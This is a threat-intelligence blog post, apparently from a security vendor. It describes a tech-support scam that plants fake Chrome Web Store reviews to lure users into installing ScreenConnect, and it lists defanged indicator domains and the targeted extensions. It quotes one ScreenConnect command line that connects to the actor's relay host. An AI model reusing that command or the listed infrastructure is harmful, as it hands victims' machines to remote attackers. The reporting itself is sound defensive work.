Back to the blog

Social engineering campaign using fake reviews on the Chrome Web Store

LastPass has reported a social engineering campaign using fake reviews on the Chrome Web Store.

LastPass has reported a social engineering campaign using fake reviews on the Chrome Web Store.

‍

A malicious actor is adding fake reviews and directing customers to call to a number controlled by the actor:

‍

Source: LastPass

‍

Once the victim calls the number, the representative will instruct them to visit a website (dghelp[.]top) while on the line.

‍

This will initiate the process to install a ScreenConnect instance to control the victim remotely:

‍

ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=n9back366[.]stream

‍

‍

‍

The Nudge Security team has identified this activity as part of a larger cluster of malicious infrastructure used by this threat actor beyond what has been reported by LastPass and BleepingComputer.

‍

Indicators of compromise:

‍

molatorimax[.]icu
ephjsuorzrno[.]me
n9639.loglink3[.]site
qeqertarmanaq954[.]icu
n9back366[.]stream
m3699.loglink3[.]site
m6back639[.]win
molatorila[.]icu
m8912.loglink3[.]site
fgx4vh52[.]me
siorapasup035[.]icu
‍

In addition to that, looking at the phone number used by the threat actor, we have found many instances of other Chrome extension reviews beyond LastPass targeting users of other password managers such as Dashlane:

‍

Ticketmaster, Skiddle, AXS - Queue Assistant - hhhfdmeccebonifdjlnfligonmdjdecm

Save to Facebook - jmfikkaogpplgnfjmbjdpalkhclendgd

Alura: All-in-One Etsy Seller Solution - nhbghfidknjdblpfcmkkdpcfigkkpgpi

Amazon Customer Service Helper - cmfafbmoadifedfpkmmgmngimbbgddlo

Fakespot Fake Amazon Reviews and eBay Sellers - nakplnnackehceedgkgkokbgbmfghain

TicketMaster Bot - cdalpcpllcmedajccdegodnlkkiddkhi

Dashlane — Password Manager - fdjamakpfbbddfjaooikfcpapjohcfmg

SEOSpace - The SEO Plugin for Squarespace - jdpdpdkkofoclmgbopofhlmoikpfamao

Honey: Automatic Coupons & Rewards - bmnlcjabgnpnenekpadlanbbkooimhnj

Squarespace ID Finder - igjamfnifnkmecjidfbdipieoaeghcff

Keepa - Amazon Price Tracker - neebplgakaahbhdphmkckjjcegoiijjo

Cash App - lmejgebmehcaipipjccpfniilegbghji

Hulu Ad Skipper | Ad Blocker - pgpdfnkeeppfohmophlpcfmciioeenig

Youtube TV - eipbidbihnpafjpfpcpnnfmlebiagola

Peacock TV Picture In Picture - fbejkdknoibjclidhlaeejnekhhppgmh

Grammarly: AI Writing and Grammar Checker App - kbfnbcaeplbcioakkpcpgfkobkghlhen

Capital One Shopping: Save Now - nenlahapcbofgnanklpelkaejcehkggg

Roku pixel helper - kcpbomhhmopchbefhpphdboleijpjfge

Google Translate - aapbdbdomjkkjkaonfhkkikfgjllcleb

‍

Related posts

Report

Debunking the "stupid user" myth
in security

Exploring the influence of employees’ perception
and emotions on security behaviors